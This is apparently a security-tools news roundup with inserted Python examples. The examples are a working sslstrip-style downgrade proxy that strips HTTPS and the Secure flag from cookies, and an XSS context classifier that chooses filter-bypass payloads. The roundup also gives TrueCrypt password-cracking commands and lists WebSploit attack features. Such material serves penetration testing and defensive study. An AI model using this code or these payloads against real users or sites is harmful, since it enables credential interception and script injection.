Burp Suite helps you secure your web applications by finding the vulnerabilities they contain.  Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
User Interface:
Burp's UI has been completely overhauled, to improve looks and usability:
  • Fonts are now configurable throughout the UI, with corresponding resizing of all UI elements (tables, dialogs, buttons, etc.).
  • There are configurable hotkeys for all common functions.
  • Intruder and Repeater now have smart tabs, which you can drag to reorder, and click to create, close or rename.
  • Tables are natively sortable everywhere, except where the row ordering is part of the options you are configuring.
  • Text fields now have context-aware auto-complete memory.
Burp now implements sslstrip-style functionality, allowing you to use non-SSL-capable tools against HTTPS applications, or to perform active MITM attacks against users who begin browsing using HTTP.
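As an added example of the downgrade described above (not Burp's code, and a simplification of the original sslstrip technique), the following shows the state an attacking proxy has to keep: which hosts it has rewritten from https to http in responses, so that when the victim's plaintext request for that host arrives, the proxy knows to speak TLS upstream. It also handles the two places links hide outside the body, the Location header and the Secure flag on cookies. The sample response body, headers and hostnames are constructed.

```python
"""sslstrip-style downgrade state for a man-in-the-middle proxy.

Added example, not Burp code. The proxy sits between a victim browsing over
plaintext HTTP and servers it reaches over TLS; every https:// reference it
hands back to the victim is downgraded to http:// and remembered.
"""
import re

# An https URL up to whitespace or a delimiter; group 1 is host[/path...].
HTTPS_URL = re.compile(r"https://([^\s\"'<>]+)")

# Constructed sample response, not captured traffic.
SAMPLE_BODY = (
    '<a href="https://bank.example.test/login">Log in</a>\n'
    '<img src="https://cdn.example.test/logo.png">\n'
    '<a href="http://plain.example.test/">already plaintext</a>'
)
SAMPLE_HEADERS = {
    "Location": "https://bank.example.test/account",
    "Set-Cookie": "sid=abc123; Secure; HttpOnly",
}


class StripProxyState:
    def __init__(self):
        self.stripped_hosts = set()   # hosts the victim now expects over http

    def rewrite_body(self, body: str) -> str:
        """Downgrade every https:// URL in a response body to http://."""
        def swap(m):
            host = m.group(1).split("/", 1)[0]
            self.stripped_hosts.add(host)
            return "http://" + m.group(1)
        return HTTPS_URL.sub(swap, body)

    def rewrite_headers(self, headers: dict) -> dict:
        """Downgrade redirects and drop the Secure flag so the browser keeps
        sending the cookie over the now-plaintext connection."""
        out = {}
        for name, value in headers.items():
            if name.lower() == "location":
                value = self.rewrite_body(value)
            elif name.lower() == "set-cookie":
                value = re.sub(r";\s*secure\b", "", value, flags=re.I)
            out[name] = value
        return out

    def upstream_scheme(self, host: str) -> str:
        """For a plaintext request from the victim, the scheme the proxy must
        use toward the real server."""
        return "https" if host in self.stripped_hosts else "http"


if __name__ == "__main__":
    state = StripProxyState()
    print(state.rewrite_body(SAMPLE_BODY))
    print(state.rewrite_headers(SAMPLE_HEADERS))
    print(sorted(state.stripped_hosts))
```

The attack only works on a user who starts out over HTTP or follows a link the proxy got to rewrite; a browser that already holds an HSTS entry for the host will refuse the plaintext request regardless of what the proxy rewrote, which is the check to run when assessing whether an application is exposed to this.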

[BackBox Linux] Version 3.0

BackBox is a Linux distribution based on Ubuntu Desktop, and designed for performing penetration testing, incident response, computer forensics, and intelligence gathering. It uses the Xfce desktop environment, and is developed by Raffaele Forte and a small but dedicated team.
This release includes features such as the new Linux kernel 3.2 and Xfce 4.8. Apart from the major system upgrade, all auditing tools are up to date as well.
What's new
  • System upgrade
  • Bug corrections
  • Performance boost
  • Improved start menu
  • Improved Wi-Fi drivers (compat-wireless, aircrack patched)
  • New and updated hacking tools
System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 4.4 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port

[DEFT 7.2] Computer Forensic live system

DEFT 7.2 is the last 32-bit release, but bug fixes will be supported until 2020. DEFT is a new concept of Computer Forensic live system that uses LXDE as its desktop environment, with Thunar as file manager and mount manager for device management. It is a very easy-to-use system that includes excellent hardware detection and the best free and open source applications dedicated to incident response and computer forensics.


New in this release:

  • Virtual appliance based on Vmware 5 with USB3 support
  • Kernel 3.0.0-26
  • Autopsy 3 beta 5 (using Wine – please note that you need minimum 1GB ram)
  • Log2timeline 0.65
  • Guymager 0.6.12-1
  • Vmfs support
  • Some mirror fixes

[Android Privacy Guard v1.0.8] OpenPGP for Android

Android has no built-in public key encryption yet, but that is an important feature for many of us. Android Privacy Guard manages OpenPGP keys on your phone and uses them to encrypt, sign and decrypt emails and files.
Change log v1.0.8
  • HKP key server support
  • app2sd support
  • more pass phrase cache options: 1, 2, 4, 8 hours
  • bugfixes

[Snuck] Automatic XSS filter bypass

Snuck is an automatic tool whose goal is to thoroughly test a given XSS filter by specializing the injections on the basis of the reflection context. It uses Selenium to drive a web browser, reproducing both the attacker's behaviour and the victim's.
snuck is an automated tool that can definitely help in finding XSS vulnerabilities in web applications. It is based on Selenium and supports Mozilla Firefox, Google Chrome and Internet Explorer.
The approach it adopts is based on inspecting the injection's reflection context and relies on a set of specialized and obfuscated attack vectors for filter evasion. In addition, XSS testing is performed in-browser: a real web browser is driven to reproduce the attacker's behaviour and possibly the victim's.
snuck is quite different from typical web security scanners: it basically tries to break a given XSS filter by specializing the injections in order to increase the success rate. The attack vectors are selected on the basis of the reflection context, that is, the exact point in the reflecting web page's DOM where the injection lands.
Access to the pages' DOM is possible through Selenium WebDriver, a browser automation framework that replicates user operations in web browsers. Since many steps may be involved before an XSS filter is "activated", an XML configuration file must be filled in to make snuck aware of the steps it needs to perform against the tested web application.
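The core of this approach, classifying where a probe lands and choosing a vector that breaks out of exactly that context, can be shown without a browser. The following is an added example, not snuck's code: it injects a unique marker, inspects the reflected HTML to decide whether the marker sits in the body, inside a quoted or unquoted attribute, inside a script string or a comment, and then picks a matching probe. The contexts, probe strings, marker, sample templates and the weak filter are all constructed for the example; snuck's real vector set is larger and obfuscated.

```python
"""Reflection-context detection for XSS probing.

Added example, not snuck code. Templates stand in for an application's
reflection points; `naive_filter` stands in for a weak XSS filter.
"""
import re

MARKER = "zxq9"   # unique, harmless probe string (assumption)

# context -> a probe that breaks out of that context (illustrative set)
PROBES = {
    "html_body": "<svg/onload=alert(1)>",
    "attr_double": '"><svg/onload=alert(1)>',
    "attr_single": "'><svg/onload=alert(1)>",
    "attr_unquoted": " onmouseover=alert(1) x=",
    "script_string_double": '";alert(1);//',
    "script_string_single": "';alert(1);//",
    "script_raw": ";alert(1);//",
    "comment": "--><svg/onload=alert(1)>",
    "not_reflected": None,
}

# Constructed reflection points; {} is where user input is echoed.
TEMPLATES = {
    "search": "<html><body><p>Results for: {}</p></body></html>",
    "profile": '<input type="text" name="nick" value="{}">',
    "tracker": '<script>var q = "{}"; track(q);</script>',
}


def _open_quote(s: str, escapes: bool):
    """Return the quote character left open at the end of s, or None.
    JavaScript honours backslash escapes; HTML attributes do not."""
    q = None
    i = 0
    while i < len(s):
        c = s[i]
        if q is None:
            if c in "\"'":
                q = c
        elif escapes and c == "\\":
            i += 1
        elif c == q:
            q = None
        i += 1
    return q


def reflection_context(html: str, marker: str = MARKER) -> str:
    """Classify where the first reflection of `marker` sits in `html`."""
    idx = html.find(marker)
    if idx < 0:
        return "not_reflected"
    before = html[:idx]
    # 1. inside an HTML comment?
    if before.rfind("<!--") > before.rfind("-->"):
        return "comment"
    # 2. inside an unclosed <script> block?
    scripts = list(re.finditer(r"<script\b[^>]*>", before, re.I))
    if scripts and not re.search(r"</script\s*>", before[scripts[-1].end():], re.I):
        q = _open_quote(before[scripts[-1].end():], escapes=True)
        return {'"': "script_string_double", "'": "script_string_single"}.get(q, "script_raw")
    # 3. inside a tag (a '<' more recent than any '>')?
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:
        q = _open_quote(before[lt:], escapes=False)
        return {'"': "attr_double", "'": "attr_single"}.get(q, "attr_unquoted")
    return "html_body"


def naive_filter(s: str) -> str:
    """Constructed weak filter: strips literal <script> tags and nothing else."""
    return re.sub(r"</?script[^>]*>", "", s, flags=re.I)


def probe(template: str, filter_fn=naive_filter, marker: str = MARKER):
    """Two-step test: learn the context from the marker, then send the
    context-specific probe and check it survived the filter intact.
    Returns (context, probe sent, probe reflected unmodified)."""
    ctx = reflection_context(template.format(filter_fn(marker)), marker)
    vector = PROBES[ctx]
    if vector is None:
        return ctx, None, False
    page = template.format(filter_fn(vector))
    return ctx, vector, vector in page


if __name__ == "__main__":
    for name, tpl in TEMPLATES.items():
        print(name, probe(tpl))
```

The unmodified-reflection check is a stand-in for what snuck does in a real browser, where the only reliable verdict is whether the payload actually executes; encoding, duplicate filtering passes and client-side rewriting can all make a string that survives verbatim still fail to run, or vice versa.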

[TCHead] TrueCrypt Password Cracking Tool

TCHead is software that decrypts and verifies TrueCrypt headers. TCHead supports all the current hashes, individual ciphers, standard volume headers, hidden volume headers and system drive encrypted headers (preboot authentication).
Brute-force TrueCrypt: However, TrueCrypt passwords are strengthened by many iterations of the key-derivation function (PBKDF2), so cracking them takes time, and very strong passwords will not be cracked. Also, in addition to trying multiple passwords, an attacker must try each password against each combination of hash and cipher (assuming they do not know what these are beforehand). System-encrypted hard drives use only one hash and cipher, so attacking those is faster.
Testing TCHead: Create a TrueCrypt volume using the default hash and cipher (RIPEMD-160 and AES), set the password to "secret", then run TCHead against it like this and it will decrypt the header (provided that the word "secret" is in the word list)
Command : TCHead -f name_of_volume.tc -P words.txt
Decrypt hidden volumes:
Command : TCHead -f name_of_volume.tc -P words.txt --hidden
Multiple passwords (brute-force): Create or download a list of words in a text file (one word per line) using words that you think are likely to decrypt the header, then run TCHead against it like this. If the correct password is found, the header will be decrypted:
Command : TCHead -f name_of_volume.tc -P words.txt

[WebSploit] Framework 2.0.3 with Wifi Jammer

WebSploit is an open source project for scanning and analysing remote systems for vulnerabilities.


WebSploit Is An Open Source Project For :
[>]Social Engineering Works
[>]Scan,Crawler & Analysis Web
[>]Automatic Exploiter
[>]Support Network Attacks
[+]Autopwn - uses Metasploit to scan and exploit target services
[+]wmap - scans and crawls the target using the Metasploit wmap plugin
[+]format infector - injects reverse & bind payloads into file formats
[+]phpmyadmin Scanner
[+]LFI Bypasser
[+]Apache Users Scanner
[+]Dir Bruter
[+]admin finder
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack
[+]MFOD Attack Vector
[+]USB Infection Attack
[+]ARP Dos Attack
[+]Web Killer Attack
[+]Fake Update Attack
[+]Fake Access point Attack

Download WebSploit Framework 2.0.3